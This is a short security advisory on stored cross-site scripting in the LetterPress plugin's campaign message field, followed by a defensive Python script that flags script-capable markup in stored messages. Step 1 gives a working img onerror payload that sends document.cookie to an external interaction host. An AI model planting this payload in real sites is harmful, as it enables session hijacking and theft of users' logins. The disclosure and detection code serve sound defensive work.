Description: The LetterPress plugin <= 1.2.1 is vulnerable to cookie stealing. An attacker can steal cookies by injecting JavaScript code.
Exploit:
1. In the LetterPress plugin, navigate to Add Campaign, insert the code “<img src=x onerror="location.href='https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c='+ document.cookie">” in the HTML Campaign Message input field, and click on Save Campaign.
2. View the campaign and monitor the requests and responses on a 3rd-party site (e.g. Burp Collaborator).
3. The cookie values are passed in the GET parameter of the 3rd-party site.
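
A defensive check for the HTML Campaign Message field described above, as an added example that is not the plugin's code: it parses a stored campaign message and reports inline event handlers, script-capable URLs and active-content elements. The function names and sample messages are constructed for illustration, and how the messages are exported from the site is assumed to be handled separately.

```python
from html.parser import HTMLParser

# Attributes whose value is fetched or navigated to by the browser.
URL_ATTRS = {"href", "src", "action", "formaction"}
# Elements that can run or embed active content on their own.
BLOCKED_TAGS = {"script", "iframe", "object", "embed"}


class CampaignAudit(HTMLParser):
    """Collects markup in a campaign message that can execute script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (tag, attribute, reason) tuples

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and decodes
        # character references in attribute values before we see them.
        if tag in BLOCKED_TAGS:
            self.findings.append((tag, "", "active-content element"))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name, "inline event handler"))
            elif name in URL_ATTRS:
                # Drop whitespace so "java\tscript:" is still recognised.
                url = "".join((value or "").split()).lower()
                if url.startswith(("javascript:", "data:text/html")):
                    self.findings.append((tag, name, "script-capable URL"))


def audit_message(html):
    """Return the list of findings for one stored campaign message."""
    parser = CampaignAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample messages (not taken from a real site).
SAMPLES = {
    "plain newsletter": '<h1>Sale</h1><a href="https://shop.example/">Shop</a>',
    "event handler": '<p>Hello</p><img src=x onerror="f()">',
    "encoded js url": '<a href="java&#115;cript:void(0)">click</a>',
}

if __name__ == "__main__":
    for label, message in SAMPLES.items():
        print(label, "->", audit_message(message) or "clean")
```

A non-empty result means the stored message should be rejected or sanitized on save and escaped on output before it is rendered to any logged-in user.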